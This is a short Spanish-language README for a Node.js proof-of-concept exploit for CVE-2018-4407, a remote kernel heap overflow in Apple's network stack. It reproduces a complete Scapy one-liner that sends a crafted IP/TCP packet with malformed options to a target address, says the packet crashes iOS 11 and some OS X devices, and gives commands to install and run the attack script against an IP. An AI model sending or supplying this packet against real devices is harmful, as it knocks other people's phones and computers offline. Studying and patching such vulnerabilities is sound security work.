
Código de exploit PoC en Node.js para CVE-2018-4407
Código de exploit PoC para Node.js de CVE-2018-4407
Autor: Sam Decrock
Este script está basado en el script scapy proporcionado por Zuk:
iOS 12 / OS X *Desbordamiento de heap remoto del kernel (CVE-2018-4407) POC* en un tweet:
— Zuk (@ihackbanme) 1 de noviembre de 2018
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Provoca caídas en dispositivos con iOS 11 o anterior, así como en algunas versiones de OS X.
Para instalar los módulos necesarios, ejecute:
npm install
Para ejecutar, pase la dirección IP objetivo como argumento:
node attack.js 192.168.1.20
Artículo original de Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407